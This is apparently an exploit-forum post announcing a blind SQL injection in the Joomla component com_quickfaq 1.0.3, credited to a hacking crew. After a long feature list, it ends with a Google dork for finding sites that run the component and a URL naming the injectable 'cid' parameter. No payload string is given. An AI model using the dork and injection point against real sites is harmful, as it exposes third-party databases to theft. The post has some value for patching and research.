----------------------------------------------------------------------------------------- Joomla Component (com_quickfaq) BSQL-i Vulnerability ----------------------------------------------------------------------------------------- [+]Title Joomla Component (com_quickfaq) BSQL-i Vulnerability [+]Author **RoAd_KiLlEr** [+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws [+]Tested on Win Xp Sp 2/3 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws [~] Home: http://inj3ct0r.com [~] Vendor: http://www.schlu.net [~] Download Application:http://www.schlu.net/downloads/16-component/77-quickfaq.html [~] Version: 1.0.3 ==========ExPl0iT3d by **RoAd_KiLlEr**========== [+]Description: QuickFAQ is an easy to use but powerful FAQ management system. Feature List: * Unlimited Subcategories * Assign FAQ Items to multiple Categories * Create Tags/Labels to flag FAQ Items * Up/down voting of FAQ Items * Favoure FAQ Items to maintain a personal bookmark list * Document uploader/manager * PDF creation of FAQ Items * RTL support * RSS/ATOM Feeds * Detailed statistics * JComments and JomComments integration ========================================= [+] Dork: inurl:"com_quickfaq" ========================================== [+]. SQL-i Vulnerability =+=+=+=+=+=+=+=+=+ [Exploit]: http://127.0.0.1/path/index.php?option=com_quickfaq&view=category&cid=[Valid Cid]&Itemid= [BSQL-Injection]